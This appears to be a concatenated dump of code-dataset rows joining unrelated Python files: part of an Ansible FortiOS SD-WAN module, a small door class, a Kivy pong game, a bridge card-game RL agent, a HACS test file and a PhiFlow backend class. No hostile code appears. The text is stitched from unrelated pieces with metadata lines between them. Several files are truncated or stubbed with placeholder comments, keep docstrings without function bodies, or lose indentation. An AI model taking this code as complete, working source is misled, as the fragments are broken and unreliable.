- Latency for SLA to make decision in milliseconds. (0 - 10000000).
type: int
link_cost_factor:
description:
- Criteria on which to base link selection.
type: str
choices:
- latency
- jitter
- packet-loss
packetloss_threshold:
description:
- Packet loss for SLA to make decision in percentage. (0 - 100).
type: int
threshold_alert_jitter:
description:
- Alert threshold for jitter (ms).
type: int
threshold_alert_latency:
description:
- Alert threshold for latency (ms).
type: int
threshold_alert_packetloss:
description:
- Alert threshold for packet loss (percentage).
type: int
threshold_warning_jitter:
description:
- Warning threshold for jitter (ms).
type: int
threshold_warning_latency:
description:
- Warning threshold for latency (ms).
type: int
threshold_warning_packetloss:
description:
- Warning threshold for packet loss (percentage).
type: int
update_cascade_interface:
description:
- Enable/disable update cascade interface.
type: str
choices:
- enable
- disable
update_static_route:
description:
- Enable/disable updating the static route.
type: str
choices:
- enable
- disable
load_balance_mode:
description:
- Algorithm or mode to use for load balancing Internet traffic to SD-WAN members.
type: str
choices:
- source-ip-based
- weight-based
- usage-based
- source-dest-ip-based
- measured-volume-based
members:
description:
- Physical FortiGate interfaces added to the virtual-wan-link.
type: list
suboptions:
comment:
description:
- Comments.
type: str
gateway:
description:
- The default gateway for this interface. Usually the default gateway of the Internet service provider that this interface is
connected to.
type: str
gateway6:
description:
- IPv6 gateway.
type: str
ingress_spillover_threshold:
description:
- Ingress spillover threshold for this interface (0 - 16776000 kbit/s). When this traffic volume threshold is reached, new
sessions spill over to other interfaces in the SD-WAN.
type: int
interface:
description:
- Interface name. Source system.interface.name.
type: str
priority:
description:
- Priority of the interface (0 - 4294967295). Used for SD-WAN rules or priority rules.
type: int
seq_num:
description:
- Sequence number(1-255).
type: int
source:
description:
- Source IP address used in the health-check packet to the server.
type: str
source6:
description:
- Source IPv6 address used in the health-check packet to the server.
type: str
spillover_threshold:
description:
- Egress spillover threshold for this interface (0 - 16776000 kbit/s). When this traffic volume threshold is reached, new sessions
spill over to other interfaces in the SD-WAN.
type: int
status:
description:
- Enable/disable this interface in the SD-WAN.
type: str
choices:
- disable
- enable
volume_ratio:
description:
- Measured volume ratio (this value / sum of all values = percentage of link volume, 0 - 255).
type: int
weight:
description:
- Weight of this interface for weighted load balancing. (0 - 255) More traffic is directed to interfaces with higher weights.
type: int
service:
description:
- Create SD-WAN rules or priority rules (also called services) to control how sessions are distributed to physical interfaces in the
SD-WAN.
type: list
suboptions:
addr_mode:
description:
- Address mode (IPv4 or IPv6).
type: str
choices:
- ipv4
- ipv6
bandwidth_weight:
description:
- Coefficient of reciprocal of available bidirectional bandwidth in the formula of custom-profile-1.
type: int
default:
description:
- Enable/disable use of SD-WAN as default service.
type: str
choices:
- enable
- disable
dscp_forward:
description:
- Enable/disable forward traffic DSCP tag.
type: str
choices:
- enable
- disable
dscp_forward_tag:
description:
- Forward traffic DSCP tag.
type: str
dscp_reverse:
description:
- Enable/disable reverse traffic DSCP tag.
type: str
choices:
- enable
- disable
dscp_reverse_tag:
description:
- Reverse traffic DSCP tag.
type: str
dst:
description:
- Destination address name.
type: list
suboptions:
name:
description:
- Address or address group name. Source firewall.address.name firewall.addrgrp.name.
required: true
type: str
dst_negate:
description:
- Enable/disable negation of destination address match.
type: str
choices:
- enable
- disable
dst6:
description:
- Destination address6 name.
type: list
suboptions:
name:
description:
- Address6 or address6 group name. Source firewall.address6.name firewall.addrgrp6.name.
required: true
type: str
end_port:
description:
- End destination port number.
type: int
gateway:
description:
- Enable/disable SD-WAN service gateway.
type: str
choices:
- enable
- disable
groups:
description:
- User groups.
type: list
suboptions:
name:
description:
- Group name. Source user.group.name.
required: true
type: str
health_check:
description:
- Health check. Source system.virtual-wan-link.health-check.name.
type: str
hold_down_time:
description:
- Waiting period in seconds when switching from the back-up member to the primary member (0 - 10000000).
type: int
id:
description:
- Priority rule ID (1 - 4000).
required: true
type: int
input_device:
description:
- Source interface name.
type: list
suboptions:
name:
description:
- Interface name. Source system.interface.name.
required: true
type: str
internet_service:
description:
- Enable/disable use of Internet service for application-based load balancing.
type: str
choices:
- enable
- disable
internet_service_ctrl:
description:
- Control-based Internet Service ID list.
type: list
suboptions:
id:
description:
- Control-based Internet Service ID.
required: true
type: int
internet_service_ctrl_group:
description:
- Control-based Internet Service group list.
type: list
suboptions:
name:
description:
- Control-based Internet Service group name. Source application.group.name.
required: true
type: str
internet_service_custom:
description:
- Custom Internet service name list.
type: list
suboptions:
name:
description:
- Custom Internet service name. Source firewall.internet-service-custom.name.
required: true
type: str
internet_service_custom_group:
description:
- Custom Internet Service group list.
type: list
suboptions:
name:
description:
- Custom Internet Service group name. Source firewall.internet-service-custom-group.name.
required: true
type: str
internet_service_group:
description:
- Internet Service group list.
type: list
suboptions:
name:
description:
- Internet Service group name. Source firewall.internet-service-group.name.
required: true
type: str
internet_service_id:
description:
- Internet service ID list.
type: list
suboptions:
id:
description:
- Internet service ID. Source firewall.internet-service.id.
required: true
type: int
jitter_weight:
description:
- Coefficient of jitter in the formula of custom-profile-1.
type: int
latency_weight:
description:
- Coefficient of latency in the formula of custom-profile-1.
type: int
link_cost_factor:
description:
- Link cost factor.
type: str
choices:
- latency
- jitter
- packet-loss
- inbandwidth
- outbandwidth
- bibandwidth
- custom-profile-1
link_cost_threshold:
description:
- Percentage threshold change of link cost values that will result in policy route regeneration (0 - 10000000).
type: int
member:
description:
- Member sequence number.
type: int
mode:
description:
- Control how the priority rule sets the priority of interfaces in the SD-WAN.
type: str
choices:
- auto
- manual
- priority
- sla
name:
description:
- Priority rule name.
type: str
packet_loss_weight:
description:
- Coefficient of packet-loss in the formula of custom-profile-1.
type: int
priority_members:
description:
- Member sequence number list.
type: list
suboptions:
seq_num:
description:
- Member sequence number. Source system.virtual-wan-link.members.seq-num.
type: int
protocol:
description:
- Protocol number.
type: int
quality_link:
description:
- Quality grade.
type: int
route_tag:
description:
- IPv4 route map route-tag.
type: int
sla:
description:
- Service level agreement (SLA).
type: list
suboptions:
health_check:
description:
- Virtual WAN Link health-check. Source system.virtual-wan-link.health-check.name.
type: str
id:
description:
- SLA ID.
type: int
src:
description:
- Source address name.
type: list
suboptions:
name:
description:
- Address or address group name. Source firewall.address.name firewall.addrgrp.name.
required: true
type: str
src_negate:
description:
- Enable/disable negation of source address match.
type: str
choices:
- enable
- disable
src6:
description:
- Source address6 name.
type: list
suboptions:
name:
description:
- Address6 or address6 group name. Source firewall.address6.name firewall.addrgrp6.name.
required: true
type: str
start_port:
description:
- Start destination port number.
type: int
status:
description:
- Enable/disable SD-WAN service.
type: str
choices:
- enable
- disable
tos:
description:
- Type of service bit pattern.
type: str
tos_mask:
description:
- Type of service evaluated bits.
type: str
users:
description:
- User name.
type: list
suboptions:
name:
description:
- User name. Source user.local.name.
required: true
type: str
status:
description:
- Enable/disable SD-WAN.
type: str
choices:
- disable
- enable
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
ssl_verify: "False"
tasks:
- name: Configure redundant internet connections using SD-WAN (formerly virtual WAN link).
fortios_system_virtual_wan_link:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
system_virtual_wan_link:
fail_alert_interfaces:
-
name: "default_name_4 (source system.interface.name)"
fail_detect: "enable"
health_check:
-
addr_mode: "ipv4"
failtime: "8"
http_agent: "<your_own_value>"
http_get: "<your_own_value>"
http_match: "<your_own_value>"
interval: "12"
members:
-
seq_num: "14 (source system.virtual-wan-link.members.seq-num)"
name: "default_name_15"
packet_size: "16"
password: "<your_own_value>"
port: "18"
protocol: "ping"
recoverytime: "20"
security_mode: "none"
server: "192.168.100.40"
sla:
-
id: "24"
jitter_threshold: "25"
latency_threshold: "26"
link_cost_factor: "latency"
packetloss_threshold: "28"
threshold_alert_jitter: "29"
threshold_alert_latency: "30"
threshold_alert_packetloss: "31"
threshold_warning_jitter: "32"
threshold_warning_latency: "33"
threshold_warning_packetloss: "34"
update_cascade_interface: "enable"
update_static_route: "enable"
load_balance_mode: "source-ip-based"
members:
-
comment: "Comments."
gateway: "<your_own_value>"
gateway6: "<your_own_value>"
ingress_spillover_threshold: "42"
interface: "<your_own_value> (source system.interface.name)"
priority: "44"
seq_num: "45"
source: "<your_own_value>"
source6: "<your_own_value>"
spillover_threshold: "48"
status: "disable"
volume_ratio: "50"
weight: "51"
service:
-
addr_mode: "ipv4"
bandwidth_weight: "54"
default: "enable"
dscp_forward: "enable"
dscp_forward_tag: "<your_own_value>"
dscp_reverse: "enable"
dscp_reverse_tag: "<your_own_value>"
dst:
-
name: "default_name_61 (source firewall.address.name firewall.addrgrp.name)"
dst_negate: "enable"
dst6:
-
name: "default_name_64 (source firewall.address6.name firewall.addrgrp6.name)"
end_port: "65"
gateway: "enable"
groups:
-
name: "default_name_68 (source user.group.name)"
health_check: "<your_own_value> (source system.virtual-wan-link.health-check.name)"
hold_down_time: "70"
id: "71"
input_device:
-
name: "default_name_73 (source system.interface.name)"
internet_service: "enable"
internet_service_ctrl:
-
id: "76"
internet_service_ctrl_group:
-
name: "default_name_78 (source application.group.name)"
internet_service_custom:
-
name: "default_name_80 (source firewall.internet-service-custom.name)"
internet_service_custom_group:
-
name: "default_name_82 (source firewall.internet-service-custom-group.name)"
internet_service_group:
-
name: "default_name_84 (source firewall.internet-service-group.name)"
internet_service_id:
-
id: "86 (source firewall.internet-service.id)"
jitter_weight: "87"
latency_weight: "88"
link_cost_factor: "latency"
link_cost_threshold: "90"
member: "91"
mode: "auto"
name: "default_name_93"
packet_loss_weight: "94"
priority_members:
-
seq_num: "96 (source system.virtual-wan-link.members.seq-num)"
protocol: "97"
quality_link: "98"
route_tag: "99"
sla:
-
health_check: "<your_own_value> (source system.virtual-wan-link.health-check.name)"
id: "102"
src:
-
name: "default_name_104 (source firewall.address.name firewall.addrgrp.name)"
src_negate: "enable"
src6:
-
name: "default_name_107 (source firewall.address6.name firewall.addrgrp6.name)"
start_port: "108"
status: "enable"
tos: "<your_own_value>"
tos_mask: "<your_own_value>"
users:
-
name: "default_name_113 (source user.local.name)"
status: "disable"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG
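def main():
    # Hypothetical placeholder: the real main() (truncated in this dump) builds the full
    # argument spec from DOCUMENTATION above, logs in via FortiOSHandler or an httpapi
    # Connection, and applies the system_virtual_wan_link configuration.
    module = AnsibleModule(argument_spec=dict(), supports_check_mode=False)
    module.exit_json(changed=False)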
if __name__ == '__main__':
main()
| 45.823781 | 158 | 0.396823 |
6a3d5a0b8814fbb4a8dcce839502382dcb8efe0a
| 1,120 |
py
|
Python
|
src/Puerta.py
|
victorlujan/Dise-odeSoftwarePatrones
|
b9845cc1c4abdc44867c90b9e9784246e57f16b3
|
[
"MIT"
] | null | null | null |
src/Puerta.py
|
victorlujan/Dise-odeSoftwarePatrones
|
b9845cc1c4abdc44867c90b9e9784246e57f16b3
|
[
"MIT"
] | null | null | null |
src/Puerta.py
|
victorlujan/Dise-odeSoftwarePatrones
|
b9845cc1c4abdc44867c90b9e9784246e57f16b3
|
[
"MIT"
] | null | null | null |
from ElementoMapa import ElementoMapa
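# The class body was truncated in this dump. A minimal sketch consistent with the import
# (attribute and method names are assumptions, following the project's Spanish naming):
class Puerta(ElementoMapa):
    def __init__(self):
        self.abierta = False
    def abrir(self):
        self.abierta = True
    def cerrar(self):
        self.abierta = False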
| 24.347826 | 101 | 0.583036 |
6a3f937a42b26dd8a8d5325705ad3a6b2426f5e8
| 2,421 |
py
|
Python
|
pong.py
|
Teenahshe/ponggame
|
5e4032753894ce1e1ebeb51841676aac24aa22df
|
[
"MIT"
] | null | null | null |
pong.py
|
Teenahshe/ponggame
|
5e4032753894ce1e1ebeb51841676aac24aa22df
|
[
"MIT"
] | null | null | null |
pong.py
|
Teenahshe/ponggame
|
5e4032753894ce1e1ebeb51841676aac24aa22df
|
[
"MIT"
] | null | null | null |
"""
# Step 1 - Create the App
# Step 2 - Create the Game
# Step 3 - Build the Game
# Step 4 - Run the App
"""
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.properties import NumericProperty, ReferenceListProperty, ObjectProperty
from kivy.vector import Vector
from kivy.clock import Clock
from random import randint
# Update - moving the ball by calling the move function and other stuff
# on touch_down() = When our fingers/mouse touches he screen
# on touch_up() - when we lift our finger off the screen after touching it
# on_touch_move() - when we drag our finger on the screen
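# The class definitions were truncated in this dump. Minimal stand-ins follow so the run()
# call below works; the real game wires up the ball, paddles and Clock per the steps above:
class PongGame(Widget):
    pass
class PongApp(App):
    def build(self):
        return PongGame()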
PongApp().run()
| 28.482353 | 83 | 0.620818 |
6a3fb6dff04d4cee8ea3de55fdb86c079b4a97dc
| 18,713 |
py
|
Python
|
bridge_RL_agent_v16.py
|
EricZLou/BridgeRLAgent
|
78329eec5fcf320d2850f44dc33b138919fba82d
|
[
"MIT"
] | null | null | null |
bridge_RL_agent_v16.py
|
EricZLou/BridgeRLAgent
|
78329eec5fcf320d2850f44dc33b138919fba82d
|
[
"MIT"
] | null | null | null |
bridge_RL_agent_v16.py
|
EricZLou/BridgeRLAgent
|
78329eec5fcf320d2850f44dc33b138919fba82d
|
[
"MIT"
] | null | null | null |
"""
CS 238 Final Project: Bridge RL Agent
Eric Lou & Kimberly Tran
"""
import copy
import datetime
import numpy as np
import random
from collections import namedtuple
"""'''''''''''''''''''''''''''''''''''''''''''''''''''''''''
REPRESENTATIONS OF BRIDGE
Representing a "Card" as an integer:
Cards 0 -> 12 are Club 2 -> Club 14
Cards 13 -> 25 are Diamond 2 -> Diamond 14
Cards 26 -> 38 are Heart 2 -> Heart 14
Cards 39 -> 51 are Spade 2 -> Spade 14
Jack is 11
Queen is 12
King is 13
Ace is 14
Representing a "Suit" as an integer:
n/a is -1 <-- used in a "State" where no cards have been played yet.
Clubs is 0
Diamonds is 1
Hearts is 2
Spades is 3
Representing a "State" as an opening suit and frozenset of up to 3 "Card"-s:
    state = State(1, frozenset({23, 0}), None)
    We have a Diamond 12 and Club 2 with an opening suit of Diamonds; partners_card
    is None because the partner has not played yet.
The agent is 3rd to play a card and must play a Diamond if it has one.
Representing the MDP with a Map from a "State" to an array of length-52:
    We call this Map "weights". And the array of length-52 represents the
proportion with which the agent should play each of the 52 cards given
that it is at that state.
In this example, with state = (1, set(23, 0)), weights[state] will
likely have very large values at indices 24 and 25 since a
Diamond 13 and Diamond 14 will beat the Diamond 12.
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''"""
State = namedtuple('State', ['opening_suit', 'cards_played', 'partners_card'])
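# Worked example of the encoding above (illustrative helpers, not original code): card 23
# satisfies 23 // 13 == 1 (Diamonds) and 23 % 13 + 2 == 12, i.e. the Diamond 12 from the
# docstring; card 0 is the Club 2.
def card_suit(card):
    return card // 13  # 0=Clubs, 1=Diamonds, 2=Hearts, 3=Spades
def card_rank(card):
    return card % 13 + 2  # 2..14 with 11=J, 12=Q, 13=K, 14=A
example_state = State(opening_suit=1, cards_played=frozenset({23, 0}), partners_card=None)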
"""'''''''''''''''''''''''''''''''''''''''''''''''''''''''''
"
" DEFINE SOME CONSTANTS
"
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''"""
NUM_ACTIONS = 52 # Agent can choose any card to play (only some are valid).
NUM_GAMES_TRAIN = 10000
NUM_GAMES_TEST = 10000
STATS_PER = 1000
"""'''''''''''''''''''''''''''''''''''''''''''''''''''''''''
"
" RL AGENT
"
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''"""
"""'''''''''''''''''''''''''''''''''''''''''''''''''''''''''
"
" UTILITY FUNCTIONS
"
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''"""
"""
This function deals random cards.
"""
deck = list(range(52))
"""
This function is used by non-agents who play randomly.
"""
"""
This function determines the winner of the round.
"""
"""
This function determines the declarer based on which partnership has the most points.
Return: (agent_is_declarer, declarer_idx)
"""
"""
This function counts the points in each hand.
Note: Ace is 12, 25, 38, 51
"""
"""'''''''''''''''''''''''''''''''''''''''''''''''''''''''''
"
" TRACKS PERFORMANCE OF BRIDGE AGENT
"
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''"""
"""'''''''''''''''''''''''''''''''''''''''''''''''''''''''''
"
" PLAY A SINGLE GAME OF BRIDGE
"
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''"""
"""
This function plays 13 rounds of 1 NT bridge and outputs a winner.
"""
if __name__ == "__main__":
main()
| 37.880567 | 141 | 0.579276 |
6a40e4db387ff19b81d94d3c6d3164793744fc01
| 1,411 |
py
|
Python
|
tests/hacsbase/test_hacsbase_data.py
|
chbonkie/hacs
|
81db513a0d3d1af1acf25da7b706ae62d8fdb6fa
|
[
"MIT"
] | 2 |
2019-06-18T11:30:53.000Z
|
2019-10-03T21:34:11.000Z
|
tests/hacsbase/test_hacsbase_data.py
|
chbonkie/hacs
|
81db513a0d3d1af1acf25da7b706ae62d8fdb6fa
|
[
"MIT"
] | 341 |
2019-06-18T11:30:55.000Z
|
2021-07-15T05:38:46.000Z
|
tests/hacsbase/test_hacsbase_data.py
|
chbonkie/hacs
|
81db513a0d3d1af1acf25da7b706ae62d8fdb6fa
|
[
"MIT"
] | null | null | null |
"""Data Test Suite."""
from aiogithubapi.objects import repository
import pytest
import os
from homeassistant.core import HomeAssistant
from custom_components.hacs.hacsbase.data import HacsData
from custom_components.hacs.helpers.classes.repository import HacsRepository
from custom_components.hacs.hacsbase.configuration import Configuration
from custom_components.hacs.share import get_hacs
from tests.dummy_repository import dummy_repository_base
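# The async test bodies were truncated in this dump. A minimal sketch of the kind of test
# these imports support (assumes HacsData() takes no constructor arguments):
def test_hacs_data_can_be_constructed():
    data = HacsData()
    assert data is not None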
| 30.021277 | 76 | 0.763997 |
6a415615b9b2bc4e4bdf10ab3d417314a169e277
| 44,836 |
py
|
Python
|
phi/math/backend/_backend.py
|
marc-gav/PhiFlow
|
b6186fd1503d040997b52d49aa18cd875267c27e
|
[
"MIT"
] | null | null | null |
phi/math/backend/_backend.py
|
marc-gav/PhiFlow
|
b6186fd1503d040997b52d49aa18cd875267c27e
|
[
"MIT"
] | null | null | null |
phi/math/backend/_backend.py
|
marc-gav/PhiFlow
|
b6186fd1503d040997b52d49aa18cd875267c27e
|
[
"MIT"
] | null | null | null |
from collections import namedtuple
from contextlib import contextmanager
from threading import Barrier
from typing import List, Callable
import numpy
from ._dtype import DType, combine_types
SolveResult = namedtuple('SolveResult', [
'method', 'x', 'residual', 'iterations', 'function_evaluations', 'converged', 'diverged', 'message',
])
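# Reconstruction note: ComputeDevice and the Backend class header appear here in the
# original file but were truncated in this dump. Minimal stand-ins (a sketch; the real
# classes carry more attributes and properties):
class ComputeDevice:
    def __init__(self, backend, name: str, device_type: str, memory: int, processor_count: int, description: str):
        self.backend = backend
        self.name = name
        self.device_type = device_type  # e.g. 'CPU' or 'GPU', see Backend.list_devices()
        self.memory = memory
        self.processor_count = processor_count
        self.description = description
class Backend:
    def __init__(self, name: str, default_device: ComputeDevice = None):
        self.name = name
        self._default_device = default_device
        self.precision = 32  # assumed default float bit width used by float_type / to_complex
    @property
    def float_type(self) -> DType:
        return DType(float, self.precision)
    def combine_types(self, *dtypes: DType) -> DType:
        # Assumed to delegate to the imported combine_types at the backend's precision.
        return combine_types(*dtypes, fp_precision=self.precision)
    def supports(self, feature) -> bool:
        # Assumed semantics: a base-class feature is supported if the subclass overrides it.
        return getattr(type(self), feature.__name__) is not getattr(Backend, feature.__name__)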
def auto_cast(self, *tensors) -> list:
"""
        Determines the appropriate value type resulting from operations involving the tensors as input.
This method is called by the default implementations of basic operators.
Backends can override this method to prevent unnecessary casting.
Args:
*tensors: tensors to cast and to consider when determining the common data type
Returns:
tensors cast to a common data type
"""
dtypes = [self.dtype(t) for t in tensors]
result_type = self.combine_types(*dtypes)
if result_type.kind in (int, float, complex, bool):
tensors = [self.cast(t, result_type) for t in tensors]
return tensors
def __str__(self):
return self.name
def __repr__(self):
return self.name
def list_devices(self, device_type: str or None = None) -> List[ComputeDevice]:
"""
Fetches information about all available compute devices this backend can use.
Implementations:
* NumPy: [`os.cpu_count`](https://docs.python.org/3/library/os.html#os.cpu_count)
* PyTorch: [`torch.cuda.get_device_properties`](https://pytorch.org/docs/stable/cuda.html#torch.cuda.get_device_properties)
* TensorFlow: `tensorflow.python.client.device_lib.list_local_devices`
* Jax: [`jax.devices`](https://jax.readthedocs.io/en/latest/jax.html#jax.devices)
Args:
device_type: (optional) Return only devices of this type, e.g. `'GPU'` or `'CPU'`. See `ComputeDevice.device_type`.
Returns:
`list` of all currently available devices.
"""
raise NotImplementedError()
def get_default_device(self) -> ComputeDevice:
return self._default_device
def set_default_device(self, device: ComputeDevice or str):
if isinstance(device, str):
devices = self.list_devices(device)
            assert len(devices) >= 1, f"{self.name}: Cannot select '{device}' because no device of this type is available."
device = devices[0]
self._default_device = device
def seed(self, seed: int):
raise NotImplementedError()
def is_tensor(self, x, only_native=False):
"""
An object is considered a native tensor by a backend if no internal conversion is required by backend methods.
        An object is considered a tensor (native or otherwise) by a backend if it is not a struct (e.g. tuple, list) and all methods of the backend accept it as a tensor argument.
Args:
x: object to check
only_native: If True, only accepts true native tensor representations, not Python numbers or others that are also supported as tensors (Default value = False)
Returns:
bool: whether `x` is considered a tensor by this backend
"""
raise NotImplementedError()
def as_tensor(self, x, convert_external=True):
"""
Converts a tensor-like object to the native tensor representation of this backend.
If x is a native tensor of this backend, it is returned without modification.
        If x is a Python number (numbers.Number instance), `convert_external` decides whether to convert it, unless the backend cannot handle Python numbers.
*Note:* There may be objects that are considered tensors by this backend but are not native and thus, will be converted by this method.
Args:
x: tensor-like, e.g. list, tuple, Python number, tensor
convert_external: if False and `x` is a Python number that is understood by this backend, this method returns the number as-is. This can help prevent type clashes like int32 vs int64. (Default value = True)
Returns:
tensor representation of `x`
"""
raise NotImplementedError()
def is_available(self, tensor) -> bool:
"""
Tests if the value of the tensor is known and can be read at this point.
If true, `numpy(tensor)` must return a valid NumPy representation of the value.
Tensors are typically available when the backend operates in eager mode.
Args:
tensor: backend-compatible tensor
Returns:
bool
"""
raise NotImplementedError()
def numpy(self, tensor) -> numpy.ndarray:
"""
Returns a NumPy representation of the given tensor.
If `tensor` is already a NumPy array, it is returned without modification.
This method raises an error if the value of the tensor is not known at this point, e.g. because it represents a node in a graph.
Use `is_available(tensor)` to check if the value can be represented as a NumPy array.
Args:
tensor: backend-compatible tensor
Returns:
NumPy representation of the values stored in the tensor
"""
raise NotImplementedError()
def to_dlpack(self, tensor):
raise NotImplementedError()
def from_dlpack(self, capsule):
raise NotImplementedError()
def copy(self, tensor, only_mutable=False):
raise NotImplementedError()
def call(self, f: Callable, *args, name=None):
"""
Calls `f(*args)` and returns the result.
This method may be used to register internal calls with the profiler.
Usage:
choose_backend(key).call(custom_function, *args)
"""
return f(*args)
def block_until_ready(self, values):
pass
def jit_compile(self, f: Callable) -> Callable:
return NotImplemented
def functional_gradient(self, f, wrt: tuple or list, get_output: bool):
raise NotImplementedError(self)
def custom_gradient(self, f: Callable, gradient: Callable) -> Callable:
"""
Creates a function based on `f` that uses a custom gradient for backprop.
Args:
f: Forward function.
gradient: Function for backprop. Will be called as `gradient(*d_out)` to compute the gradient of `f`.
Returns:
Function with similar signature and return values as `f`. However, the returned function does not support keyword arguments.
"""
return NotImplemented
def jit_compile_grad(self, f, wrt: tuple or list, get_output: bool):
raise NotImplementedError()
def transpose(self, tensor, axes):
raise NotImplementedError()
def random_uniform(self, shape):
""" Float tensor of selected precision containing random values in the range [0, 1) """
raise NotImplementedError(self)
def random_normal(self, shape):
""" Float tensor of selected precision containing random values sampled from a normal distribution with mean 0 and std 1. """
raise NotImplementedError(self)
def stack(self, values, axis=0):
raise NotImplementedError(self)
def concat(self, values, axis):
raise NotImplementedError(self)
def pad(self, value, pad_width, mode: str = 'constant', constant_values=0):
"""
Pad a tensor with values as specified by `mode` and `constant_values`.
If the mode is not supported, returns NotImplemented.
Args:
value: tensor
pad_width: 2D tensor specifying the number of values padded to the edges of each axis in the form [[axis 0 lower, axis 0 upper], ...] including batch and component axes.
            mode: 'constant', 'boundary', 'periodic', 'symmetric', 'reflect'
constant_values: used for out-of-bounds points if mode='constant' (Default value = 0)
mode: str: (Default value = 'constant')
Returns:
padded tensor or NotImplemented
"""
raise NotImplementedError(self)
def reshape(self, value, shape):
raise NotImplementedError(self)
def flip(self, value, axes: tuple or list):
slices = tuple(slice(None, None, -1 if i in axes else None) for i in range(self.ndims(value)))
return value[slices]
def sum(self, value, axis=None, keepdims=False):
raise NotImplementedError(self)
def prod(self, value, axis=None):
raise NotImplementedError(self)
def divide_no_nan(self, x, y):
"""
Computes x/y but returns 0 if y=0.
Args:
x:
y:
Returns:
"""
raise NotImplementedError(self)
def where(self, condition, x=None, y=None):
raise NotImplementedError(self)
def nonzero(self, values):
"""
Args:
values: Tensor with only spatial dimensions
Returns:
non-zero multi-indices as tensor of shape (nnz, vector)
"""
raise NotImplementedError(self)
def mean(self, value, axis=None, keepdims=False):
raise NotImplementedError(self)
def range(self, start, limit=None, delta=1, dtype: DType = DType(int, 32)):
raise NotImplementedError(self)
def zeros(self, shape, dtype: DType = None):
raise NotImplementedError(self)
def zeros_like(self, tensor):
raise NotImplementedError(self)
def ones(self, shape, dtype: DType = None):
raise NotImplementedError(self)
def ones_like(self, tensor):
raise NotImplementedError(self)
def meshgrid(self, *coordinates):
raise NotImplementedError(self)
def linspace(self, start, stop, number):
raise NotImplementedError(self)
def tensordot(self, a, a_axes: tuple or list, b, b_axes: tuple or list):
""" Multiply-sum-reduce a_axes of a with b_axes of b. """
raise NotImplementedError(self)
def matmul(self, A, b):
raise NotImplementedError(self)
def einsum(self, equation, *tensors):
raise NotImplementedError(self)
def while_loop(self, loop: Callable, values: tuple):
"""
```python
while any(values[0]):
values = loop(*values)
return values
```
This operation does not support backpropagation.
Args:
loop: Loop function, must return a `tuple` with entries equal to `values` in shape and data type.
values: Initial values of loop variables.
Returns:
Loop variables upon loop completion.
"""
raise NotImplementedError(self)
def abs(self, x):
raise NotImplementedError(self)
def sign(self, x):
raise NotImplementedError(self)
def round(self, x):
raise NotImplementedError(self)
def ceil(self, x):
raise NotImplementedError(self)
def floor(self, x):
raise NotImplementedError(self)
def max(self, x, axis=None, keepdims=False):
raise NotImplementedError(self)
def min(self, x, axis=None, keepdims=False):
raise NotImplementedError(self)
def maximum(self, a, b):
raise NotImplementedError(self)
def minimum(self, a, b):
raise NotImplementedError(self)
def clip(self, x, minimum, maximum):
raise NotImplementedError(self)
def sqrt(self, x):
raise NotImplementedError(self)
def exp(self, x):
raise NotImplementedError(self)
def conv(self, value, kernel, zero_padding=True):
"""
Convolve value with kernel.
Depending on the tensor rank, the convolution is either 1D (rank=3), 2D (rank=4) or 3D (rank=5).
Higher dimensions may not be supported.
Args:
value: tensor of shape (batch_size, in_channel, spatial...)
kernel: tensor of shape (batch_size or 1, out_channel, in_channel, spatial...)
zero_padding: If True, pads the edges of `value` with zeros so that the result has the same shape as `value`.
Returns:
Convolution result as tensor of shape (batch_size, out_channel, spatial...)
"""
raise NotImplementedError(self)
def expand_dims(self, a, axis=0, number=1):
raise NotImplementedError(self)
def shape(self, tensor):
raise NotImplementedError(self)
def staticshape(self, tensor):
raise NotImplementedError(self)
def cast(self, x, dtype: DType):
raise NotImplementedError(self)
def to_float(self, x):
"""
Converts a tensor to floating point values with precision equal to the currently set default precision.
See Also:
`Backend.precision()`.
If `x` is mutable and of the correct floating type, returns a copy of `x`.
To convert float tensors to the backend precision but leave non-float tensors untouched, use `Backend.as_tensor()`.
Args:
x: tensor of bool, int or float
Returns:
Values of `x` as float tensor
"""
return self.cast(x, self.float_type)
def to_int32(self, x):
return self.cast(x, DType(int, 32))
def to_int64(self, x):
return self.cast(x, DType(int, 64))
def to_complex(self, x):
return self.cast(x, DType(complex, max(64, min(self.precision * 2, 128))))
def batched_gather_nd(self, values, indices):
"""
Gathers values from the tensor `values` at locations `indices`.
The first dimension of `values` and `indices` is the batch dimension which must be either equal for both or one for either.
Args:
values: tensor of shape (batch, spatial..., channel)
indices: int tensor of shape (batch, any..., multi_index) where the size of multi_index is values.rank - 2.
Returns:
Gathered values as tensor of shape (batch, any..., channel)
"""
raise NotImplementedError(self)
def flatten(self, x):
return self.reshape(x, (-1,))
def std(self, x, axis=None, keepdims=False):
raise NotImplementedError(self)
def boolean_mask(self, x, mask, axis=0):
"""
Args:
x: tensor with any number of dimensions
mask: 1D mask tensor
axis: Axis index >= 0
"""
raise NotImplementedError(self)
def isfinite(self, x):
raise NotImplementedError(self)
def scatter(self, base_grid, indices, values, mode: str):
"""
Depending on `mode`, performs scatter_update or scatter_add.
Args:
base_grid: Tensor into which scatter values are inserted at indices. Tensor of shape (batch_size, spatial..., channels)
